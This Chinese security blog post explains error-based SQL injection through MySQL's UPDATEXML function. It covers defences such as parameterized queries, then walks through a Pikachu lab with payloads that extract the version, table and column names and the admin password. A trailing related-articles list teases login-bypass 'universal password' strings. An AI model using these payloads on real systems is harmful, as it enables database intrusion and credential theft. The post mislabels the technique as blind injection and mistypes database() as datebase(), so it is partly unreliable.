字符串类型漏洞之updatexml函数盲注

UPDATEXML 是 MySQL 数据库中的一个函数,它用于对 XML 文档数据进行修改和查询。然而,当它被不当地使用或与恶意输入结合时,它可能成为 SQL 注入攻击的一部分,从而暴露敏感信息或导致其他安全漏洞。

在 SQL 注入攻击中,攻击者尝试通过在应用程序的输入字段中插入或“注入”恶意的 SQL 代码片段,来干扰应用程序的正常 SQL 查询。如果应用程序没有正确地验证和清理用户输入,攻击者可能能够执行未经授权的数据库操作。

原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

UPDATEXML 函数在某些情况下可以被用于“盲注”(blind SQL injection)攻击中,以从数据库中提取数据。盲注是指攻击者无法直接看到查询结果的情况,但可以通过观察应用程序的响应(例如,是否产生错误)来推断出查询的结果。

以下是一个简单的例子来说明如何使用 UPDATEXML 进行盲注攻击:

假设有一个容易受到 SQL 注入攻击的查询,它使用用户提供的输入来构建 SQL 语句:

SELECT * FROM users WHERE username = '$username' AND password = '$password';
攻击者可以尝试注入 UPDATEXML 函数来触发一个错误,并通过错误消息的内容来推断出数据库中的信息。例如:

' OR 1=1 AND (SELECT UPDATEXML(1,CONCAT(0x7e,(SELECT @@version),0x7e),1))
这个注入尝试会修改原始的 SQL 查询,导致它执行一个 UPDATEXML 函数调用。如果 UPDATEXML 的第二个参数包含的数据导致一个无效的 XML 文档,MySQL 将抛出一个错误。攻击者通过构造 CONCAT 函数来包含他们想要查询的信息(在这个例子中是数据库的版本号 @@version),并将其夹在两个 0x7e(波浪号 ~ 的 ASCII 值)之间。如果查询成功执行并返回错误,错误消息中可能会包含这些信息,从而泄露给攻击者。

为了防止这种攻击,开发者应该采取以下措施:

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

参数化查询:使用预编译语句或参数化查询来避免直接将用户输入拼接到 SQL 语句中。
输入验证和清理:对用户输入进行严格的验证和清理,确保只接受预期的格式和类型的数据。
错误处理:不要向最终用户显示详细的数据库错误信息。使用自定义错误页面或日志记录来处理错误。
最小权限原则:确保数据库连接使用的帐户具有执行必要操作所需的最小权限。避免使用具有过多权限的数据库帐户。
最后,建议定期进行安全审计和漏洞扫描,以确保应用程序的安全性。

接着我们以Pikachu漏洞平台为例子:

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术
先随便输入一个字符“'”,检查有没有错误返回信息。
如果存在返回错误信息,就说明这里存在sql注入漏洞

QQ截图20240425215406.png

接着我们输入“x%' and updatexml(1,concat(0x7e,version()),0)#
查询当前的数据库版本信息

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

屏幕截图 2024-04-25 220050.png


接着我们获取当前的数据库用户名,输入“x%' and updatexml(1,concat(0x7e,datebase()),0)#
 

屏幕截图 2024-04-25 220356.png


接着我们获取当前报错返回信息行数

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术
输入“x%' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='sqlmap')),0)#

屏幕截图 2024-04-25 223053.png


接着一次次获取表名
x%' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='sqlmap' limit 0,1)),0)#

屏幕截图 2024-04-25 223307.png


接着我们获取列名
x%' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name ='users' limit 0,1)),0)#
 

屏幕截图 2024-04-25 224059.png


接着我们获取登录信息
x%' and updatexml(1,concat(0x7e,(select password from users where username = 'admin' limit 0,1)),0)#

屏幕截图 2024-04-25 224647.png


http://www.ppmy.cn/embedded/20436.html

相关文章

HTTP和HTTPS的区别及HTTPS的工作原理

一、HTTP和HTTPS的区别 1、安全性 HTTP:HTTP是明文传输的,这意味着数据在传输过程中不加密,容易受到中间人攻击。敏感信息,如密码和信用卡号,如果通过HTTP传输,可能会被窃取。HTTPS:HTTPS使用SSL(Secure Sockets Lay…

java-springmvc 01 补充 javaweb 三大组件(源码都是tomcat8.5项目中的)

01.JavaWeb三大组件指的是:Servlet、Filter、Listener,三者提供不同的功能 这三个在springmvc 运用很多 Servlet 01.Servlet接口: public interface Servlet {/*** 初始化方法* 实例化servlet之后,该方法仅调用一次 * init方法必须执行完…

阿里云esc云盘在线扩容排查记录 - by 勤勤学长

服务器原先的20g云盘满了,需要扩容。定时任务都动不,好在没有扑街。 运行日志 ★[2024-04-27 15:00:01] Successful ---------------------------------------------------------------------------- Sat Apr 27 15:30:01 2024 (766775): Fatal Error …

Linux 权限提升 - 信息收集 清单

这个清单主要使用于内网渗透的其中一个环节,信息收集此环节涉及后续是否有高效的攻击成绩,通过某些手段和技巧,可获取更多的彩蛋!🎆 攻击者可以发现目标系统的弱点和漏洞,包括但不限于: 发现潜…

OSPF路由计算

1.区域内路由计算 (1)LSA的基本概念 LS Age:当LSA被始发时,该字段为0,随着LSA在网络中被泛洪,该时间逐渐累加,当到达MaxAge(缺省值为3600s)时,LSA不再用于路…

AI视频改字个性化祝福豪车装X系统uniapp前端开源源码下载

装X系统源码简介 创意无限!AI视频改字祝福,豪车装X系统源码开源,打造个性化祝福视频不再难! 想要为你的朋友或家人送上一份特别的祝福,让他们感受到你的真诚与关怀吗?现在, 通过开源的AI视频…

探索区块链世界:赋能创新,揭示区块链媒体发稿的影响力-世媒讯

区块链,这个由“区块”和“链”组成的概念,可能在您眼中充满神秘和复杂,但其实甚至无所不在,它正静悄悄地改变着我们日常生活的方方面面,从金融到媒体,从医疗到教育。 我们来揭开区块链的神秘面纱。区块链…

Lua语法

目录 环境搭建以及第一个lua程序环境安装IDE在线工具 变量分类nilnumber string运算符算数运算符条件运算符位运算符和三目运算符 条件分支语句循环函数表迭代器遍历表基本语法类表的公共操作 多脚本执行相关概念大G表 特殊用法多变量赋值多返回值或和与用and 和 or 实现三目运…

多线程模型浅谈

优质博文:IT-BLOG-CN 笔者近期在维护的项目中发现了一些比较随机的问题,时有时无的,排查之后发现是使用多线程导致的,恍然之下研究了下多线程的底层模型相关知识,现不大家简要分享下。 一个程序进程可包含多个线程&am…

xLua详解

目录 环境准备xLua导入 C#调用LuaLua解析器Lua文件加载重定向Lua解析管理器全局变量的获取全局函数的获取List和Dictionary映射table类映射table接口映射tableLuaTable映射table Lua调用C#准备工作Lua使用C#类Lua调用C#枚举Lua使用C# 数组 List 字典数组List字典 Lua使用C#扩展…

Web安全--万能密码大全+图片马合成方法

万能密码大全: asp、aspx、php、jsp万能密码大全。 asp、aspx 万能密码 "or "a""a)or(aaor 11--or 11--aor 11--"or 11--oraa"or""aaororor1 or 1111 or 11 or 11OR 11%00"or 11%00xorPHP 万能密码: or …

8_手眼标定总结_auboi5机械臂与海康平面相机

经过不断地学习与调试,不断地学习网络上其他同志分享的资料,opencv手眼标定迎来了阶段性结束。实际测试结果在机械臂坐标系中X方向差5mm左右。 代码参考《https://blog.csdn.net/wanggao_1990/article/details/81435660》 注意事项: ①标定…

使用现代OpenGL进行物体的点选,OpenGL4.5和C++示例

目录 已经有了很多示例代码,为什么要写选择方法示例代码 已经有了很多示例代码,为什么要写 现在百度找到的大多数已有的OpenGL点选代码,使用的是老版本OpenGL的拾取功能,老版本的OpenGL是通过固定管线渲染,有渲染模式…

flutter开发实战-build apk名称及指令abiFilters常用gradle设置

flutter开发实战-build apk名称及指令abiFilters常用gradle设置 最近通过打包flutter build apk lib/main.dart --release,发现apk命名规则需要在build.gradle设置。这里记录一下。 一、apk命名规则 在android/app/build.gradle中需要设置 android.applicationVa…

06.2_c/c++开源库boost_coroutine2 协程库

1.安装与说明 安装 sudo apt install libboost-coroutine1.71-dev 编译链接 libboost-coroutine不支持.pc格式查看, 支持.cmake导入 cat /usr/lib/x86_64-linux-gnu/cmake/boost_coroutine-1.71.0/boost_coroutine-config.cmake cat /usr/lib/x86_64-linux-gnu/cmake/boost…

Kafka 3.x.x 入门到精通(07)——Java应用场景——SpringBoot集成

Kafka 3.x.x 入门到精通(07)——Java应用场景——SpringBoot集成 4. Java应用场景——SpringBoot集成4.1 创建SpringBoot项目4.1.1 创建SpringBoot项目4.1.2 修改pom.xml文件4.1.3 在resources中增加application.yml文件 4.2 编写功能代码4.2.1 创建配置…

编辑器,编译器,IDE的区别

1.编辑器,编译器 简单说编辑器是用来写代码的,而编译器是对现场高级语言代码翻译成相对低级语言的一段小程序/指令。 2.IDE 集成开发环境(IDE,Integrated Development Environment )是用于提供程序开发环境的应用程序&#xff…

Amazon云计算AWS之[5]关系数据库服务RDS

文章目录 RDS的基本原理主从备份和下读写分离 RDS的使用 RDS的基本原理 Amazon RDS(Amazon Relational Database Service) 将MySQL数据库移植到集群中,在一定的范围内解决了关系数据库的可扩展性问题。 MySQL集群方式采用Share-Nothing架构。每台数据库服务器都是…

重庆市工程技术建设专业职称申报条件

重庆市工程技术建设专业职称申报条件链接重庆市人力资源和社会保障局 重庆市住房和城乡建设委员会关于印发重庆市工程技术建设专业职称申报条件的通知_重庆市人力资源和社会保障局类别基本条件业绩成果备注助理工程师具备硕士学位或第二学士学位;或具备大学本科学历…

FreeLearning 安全译文集翻译完毕

高级基础设施渗透测试高度安全环境下的高级渗透测试AWS 渗透测试为高级渗透测试构建虚拟渗透实验室Python 高效渗透测试BurpSuite 秘籍Python 渗透测试实用指南渗透测试即时入门IOT 渗透测试秘籍渗透测试学习指南Python 渗透测试学习指南Python Web 渗透测试学习手册精通机器学…